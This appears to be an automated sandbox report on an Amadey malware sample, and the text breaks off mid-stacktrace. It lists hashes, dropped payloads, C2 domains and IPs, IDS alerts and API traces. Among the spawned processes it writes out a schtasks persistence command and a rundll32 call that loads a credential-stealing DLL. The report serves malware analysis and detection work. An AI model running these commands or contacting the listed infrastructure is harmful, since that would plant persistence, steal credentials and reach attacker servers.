Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 7, 2022, 3:45 p.m.	Dec. 7, 2022, 3:47 p.m.

Size	241.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`065ee41f9a4f66bd96f0448d68cc4178`
SHA256	`be91543d87f31d5bab7129c8bc63646ccc7c6aacabfa527ef4642a386145334c`
CRC32	`3950CF40`
ssdeep	`6144:QuipnySnYTepzkqldDIM4z9ujpdD5LGS:QbVlmM+ujpdDAS`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer UPX_Zero - UPX packed file

newlege.exe "C:\Users\test22\AppData\Local\Temp\newlege.exe"
940
- gntuud.exe "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe"
  2136
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
    2216
  - 5jk29l2fg.exe "C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe"
    2348
    - vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      2412
  - wish.exe "C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe"
    3044
  - linda5.exe "C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe"
    2132
    - msiexec.exe "C:\Windows\System32\msiexec.exe" -y .\XPsIE.42
      2296
  - anon.exe "C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe"
    2392
  - pb1109.exe "C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe"
    2556
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
    2864

Name	Response	Post-Analysis Lookup
byh.ajn322bb.com	A 104.21.25.158 A 172.67.134.92	172.67.134.92
www.time4unow.com	CNAME time4unow.com A 160.153.129.228	160.153.129.228
jamesmillion.xyz	A 104.192.2.242	104.192.2.242

IP Address	Status	Action
104.192.2.242	Active	Moloch
104.21.25.158	Active	Moloch
160.153.129.228	Active	Moloch
164.124.101.2	Active	Moloch
185.106.92.214	Active	Moloch
31.41.244.14	Active	Moloch
31.41.244.188	Active	Moloch
62.204.41.6	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 62.204.41.6:80 -> 192.168.56.103:49163	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 192.168.56.103:49164 -> 62.204.41.6:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 31.41.244.188:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 31.41.244.188:80 -> 192.168.56.103:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 31.41.244.188:80 -> 192.168.56.103:49166	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.41.244.188:80 -> 192.168.56.103:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 160.153.129.228:443 -> 192.168.56.103:49176	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 160.153.129.228:80	2021697	ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 160.153.129.228:80	2021697	ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious	A Network Trojan was detected
TCP 192.168.56.103:49181 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 160.153.129.228:443 -> 192.168.56.103:49183	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 160.153.129.228:80	2021697	ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious	A Network Trojan was detected
TCP 192.168.56.103:49187 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 160.153.129.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49190 -> 31.41.244.188:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 31.41.244.188:80 -> 192.168.56.103:49190	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 31.41.244.188:80 -> 192.168.56.103:49190	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.41.244.188:80 -> 192.168.56.103:49190	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 31.41.244.188:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 31.41.244.188:80 -> 192.168.56.103:49190	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.41.244.188:80 -> 192.168.56.103:49190	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 31.41.244.188:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 160.153.129.228:443 -> 192.168.56.103:49188	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 62.204.41.6:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.6:80 -> 192.168.56.103:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 104.21.25.158:80 -> 192.168.56.103:49198	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 104.21.25.158:80 -> 192.168.56.103:49198	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 3:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 7, 2022, 3:45 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:45 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:45 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:45 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:46 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:46 p.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 3:46 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Dec. 7, 2022, 3:45 p.m.	buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleA Dec. 7, 2022, 3:45 p.m.	buffer: zxAUIq2 console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (43 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e05b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e09f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e0bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e09b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005211d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005211d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005210d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005210d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005210d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005210d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005210d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00521350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfc88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfc88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfc88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfc88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfc88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bfd48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bff48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c0688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c0688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 3:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c0388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 7, 2022, 3:45 p.m.		1	1	0

One or more processes crashed (8 events)

Time & API	Arguments	Status
__exception__ Dec. 7, 2022, 3:45 p.m.	stacktrace: 5jk29l2fg+0x73539 @ 0xd63539 5jk29l2fg+0x734f1 @ 0xd634f1 5jk29l2fg+0x734d6 @ 0xd634d6 5jk29l2fg+0x73496 @ 0xd63496 5jk29l2fg+0x24c30 @ 0xd14c30 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 3210460 registers.edi: 3555328 registers.eax: 2412 registers.ebp: 3210500 registers.edx: 2130566132 registers.ebx: 1024 registers.esi: 14350008 registers.ecx: 2352	1
__exception__ Dec. 7, 2022, 3:45 p.m.	stacktrace: 0x725202 0x72517d 0x72111e 0x720e06 0x720056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x725291 registers.esp: 3404472 registers.edi: 40163700 registers.eax: 0 registers.ebp: 3404496 registers.edx: 4991640 registers.ebx: 39332832 registers.esi: 40163880 registers.ecx: 0	1
__exception__ Dec. 7, 2022, 3:45 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 mscorlib+0x2f45a5 @ 0x722145a5 mscorlib+0x2f74d4 @ 0x722174d4 mscorlib+0x327e5c @ 0x72247e5c 0x72b1c0 0x72b119 0x72aca3 0x72a71f 0x721159 0x720e06 0x720056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 3404020 registers.edi: 0 registers.eax: 3404020 registers.ebp: 3404100 registers.edx: 0 registers.ebx: 91587480 registers.esi: 4991640 registers.ecx: 920596262	1
__exception__ Dec. 7, 2022, 3:45 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73091194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72f62ba1 mscorlib+0x36dd51 @ 0x7228dd51 mscorlib+0x32fea6 @ 0x7224fea6 mscorlib+0x30ab40 @ 0x7222ab40 0x72b1cc 0x72b119 0x72aca3 0x72a71f 0x721159 0x720e06 0x720056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 3403968 registers.edi: 0 registers.eax: 3403968 registers.ebp: 3404048 registers.edx: 0 registers.ebx: 91587480 registers.esi: 4991640 registers.ecx: 920596222	1
__exception__ Dec. 7, 2022, 3:46 p.m.	stacktrace: 0x4f3cac 0x4f3bce 0x4f24dd 0x4f20b6 0x4f05a0 0x4f006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73e97f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73e94de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4f3da0 registers.esp: 1568136 registers.edi: 1568188 registers.eax: 0 registers.ebp: 1568200 registers.edx: 5923448 registers.ebx: 1569092 registers.esi: 38664540 registers.ecx: 0	1
__exception__ Dec. 7, 2022, 3:46 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x729f1194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x728c2ba1 mscorlib+0x36dd53 @ 0x71bedd53 mscorlib+0x32fea6 @ 0x71bafea6 mscorlib+0x30ab40 @ 0x71b8ab40 0x4fb77a 0x4fb62e 0x4fada9 0x4fa1ce 0x4f7c87 0x4f25a5 0x4f20b6 0x4f05a0 0x4f006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72842652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7285264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72852e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x729074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72907610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72991dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72991e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72991f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7299416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73e1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 